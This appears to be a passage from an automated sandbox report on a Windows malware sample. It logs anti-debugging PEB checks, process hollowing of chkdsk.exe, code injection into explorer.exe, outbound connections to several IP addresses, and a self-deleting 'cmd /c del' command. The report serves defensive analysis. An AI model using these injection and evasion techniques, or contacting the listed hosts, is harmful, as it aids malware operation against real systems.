Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]	2_2_01436962
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]	2_2_01436962
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0145096E mov eax, dword ptr fs:[00000030h]	2_2_0145096E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0145096E mov edx, dword ptr fs:[00000030h]	2_2_0145096E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0145096E mov eax, dword ptr fs:[00000030h]	2_2_0145096E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B4978 mov eax, dword ptr fs:[00000030h]	2_2_014B4978
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B4978 mov eax, dword ptr fs:[00000030h]	2_2_014B4978
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149C97C mov eax, dword ptr fs:[00000030h]	2_2_0149C97C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E908 mov eax, dword ptr fs:[00000030h]	2_2_0148E908
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E908 mov eax, dword ptr fs:[00000030h]	2_2_0148E908
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408918 mov eax, dword ptr fs:[00000030h]	2_2_01408918
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408918 mov eax, dword ptr fs:[00000030h]	2_2_01408918
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149C912 mov eax, dword ptr fs:[00000030h]	2_2_0149C912
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A892B mov eax, dword ptr fs:[00000030h]	2_2_014A892B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149892A mov eax, dword ptr fs:[00000030h]	2_2_0149892A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A69C0 mov eax, dword ptr fs:[00000030h]	2_2_014A69C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0141A9D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014449D0 mov eax, dword ptr fs:[00000030h]	2_2_014449D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DA9D3 mov eax, dword ptr fs:[00000030h]	2_2_014DA9D3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149E9E0 mov eax, dword ptr fs:[00000030h]	2_2_0149E9E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014429F9 mov eax, dword ptr fs:[00000030h]	2_2_014429F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014429F9 mov eax, dword ptr fs:[00000030h]	2_2_014429F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]	2_2_014229A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014109AD mov eax, dword ptr fs:[00000030h]	2_2_014109AD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014109AD mov eax, dword ptr fs:[00000030h]	2_2_014109AD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014989B3 mov esi, dword ptr fs:[00000030h]	2_2_014989B3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014989B3 mov eax, dword ptr fs:[00000030h]	2_2_014989B3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014989B3 mov eax, dword ptr fs:[00000030h]	2_2_014989B3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01422840 mov ecx, dword ptr fs:[00000030h]	2_2_01422840
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01440854 mov eax, dword ptr fs:[00000030h]	2_2_01440854
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414859 mov eax, dword ptr fs:[00000030h]	2_2_01414859
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414859 mov eax, dword ptr fs:[00000030h]	2_2_01414859
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6870 mov eax, dword ptr fs:[00000030h]	2_2_014A6870
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6870 mov eax, dword ptr fs:[00000030h]	2_2_014A6870
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149E872 mov eax, dword ptr fs:[00000030h]	2_2_0149E872
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149E872 mov eax, dword ptr fs:[00000030h]	2_2_0149E872
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149C810 mov eax, dword ptr fs:[00000030h]	2_2_0149C810
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B483A mov eax, dword ptr fs:[00000030h]	2_2_014B483A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B483A mov eax, dword ptr fs:[00000030h]	2_2_014B483A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A830 mov eax, dword ptr fs:[00000030h]	2_2_0144A830
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov ecx, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]	2_2_01432835
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0143E8C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E08C0 mov eax, dword ptr fs:[00000030h]	2_2_014E08C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DA8E4 mov eax, dword ptr fs:[00000030h]	2_2_014DA8E4
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0144C8F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0144C8F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410887 mov eax, dword ptr fs:[00000030h]	2_2_01410887
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149C89D mov eax, dword ptr fs:[00000030h]	2_2_0149C89D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C4B4B mov eax, dword ptr fs:[00000030h]	2_2_014C4B4B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C4B4B mov eax, dword ptr fs:[00000030h]	2_2_014C4B4B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B8B42 mov eax, dword ptr fs:[00000030h]	2_2_014B8B42
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6B40 mov eax, dword ptr fs:[00000030h]	2_2_014A6B40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6B40 mov eax, dword ptr fs:[00000030h]	2_2_014A6B40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DAB40 mov eax, dword ptr fs:[00000030h]	2_2_014DAB40
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408B50 mov eax, dword ptr fs:[00000030h]	2_2_01408B50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]	2_2_014E2B57
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]	2_2_014E2B57
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]	2_2_014E2B57
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]	2_2_014E2B57
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BEB50 mov eax, dword ptr fs:[00000030h]	2_2_014BEB50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140CB7E mov eax, dword ptr fs:[00000030h]	2_2_0140CB7E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4B00 mov eax, dword ptr fs:[00000030h]	2_2_014E4B00
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]	2_2_0148EB1D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143EB20 mov eax, dword ptr fs:[00000030h]	2_2_0143EB20
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143EB20 mov eax, dword ptr fs:[00000030h]	2_2_0143EB20
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D8B28 mov eax, dword ptr fs:[00000030h]	2_2_014D8B28
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D8B28 mov eax, dword ptr fs:[00000030h]	2_2_014D8B28
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]	2_2_01430BCB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]	2_2_01430BCB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]	2_2_01430BCB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]	2_2_01410BCD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]	2_2_01410BCD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]	2_2_01410BCD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BEBD0 mov eax, dword ptr fs:[00000030h]	2_2_014BEBD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]	2_2_01418BF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]	2_2_01418BF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]	2_2_01418BF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149CBF0 mov eax, dword ptr fs:[00000030h]	2_2_0149CBF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143EBFC mov eax, dword ptr fs:[00000030h]	2_2_0143EBFC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420BBE mov eax, dword ptr fs:[00000030h]	2_2_01420BBE
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420BBE mov eax, dword ptr fs:[00000030h]	2_2_01420BBE
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C4BB0 mov eax, dword ptr fs:[00000030h]	2_2_014C4BB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C4BB0 mov eax, dword ptr fs:[00000030h]	2_2_014C4BB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]	2_2_01416A50
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420A5B mov eax, dword ptr fs:[00000030h]	2_2_01420A5B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420A5B mov eax, dword ptr fs:[00000030h]	2_2_01420A5B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]	2_2_0144CA6F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]	2_2_0144CA6F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]	2_2_0144CA6F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BEA60 mov eax, dword ptr fs:[00000030h]	2_2_014BEA60
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148CA72 mov eax, dword ptr fs:[00000030h]	2_2_0148CA72
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148CA72 mov eax, dword ptr fs:[00000030h]	2_2_0148CA72
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149CA11 mov eax, dword ptr fs:[00000030h]	2_2_0149CA11
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144CA24 mov eax, dword ptr fs:[00000030h]	2_2_0144CA24
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143EA2E mov eax, dword ptr fs:[00000030h]	2_2_0143EA2E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01434A35 mov eax, dword ptr fs:[00000030h]	2_2_01434A35
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01434A35 mov eax, dword ptr fs:[00000030h]	2_2_01434A35
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]	2_2_01466ACC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]	2_2_01466ACC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]	2_2_01466ACC
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410AD0 mov eax, dword ptr fs:[00000030h]	2_2_01410AD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01444AD0 mov eax, dword ptr fs:[00000030h]	2_2_01444AD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01444AD0 mov eax, dword ptr fs:[00000030h]	2_2_01444AD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144AAEE mov eax, dword ptr fs:[00000030h]	2_2_0144AAEE
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144AAEE mov eax, dword ptr fs:[00000030h]	2_2_0144AAEE
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]	2_2_0141EA80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]	2_2_0141EA80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]	2_2_0141EA80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]	2_2_0141EA80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]	2_2_0141EA80

Source: C:\Users\user\Desktop\881SP1exr1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\881SP1exr1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.68.234.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.205.127.201 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.64.96 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.64.97.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.120.80.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.172.228.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.32.208.72 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\881SP1exr1.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 330000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\881SP1exr1.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\881SP1exr1.exe

Memory written: C:\Users\user\Desktop\881SP1exr1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\881SP1exr1.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\881SP1exr1.exe	Thread register set: target process: 2580			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 2580			Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe	Process created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"			Jump to behavior

Source: explorer.exe, 00000003.00000002.4092282254.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.4088992932.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Users\user\Desktop\881SP1exr1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
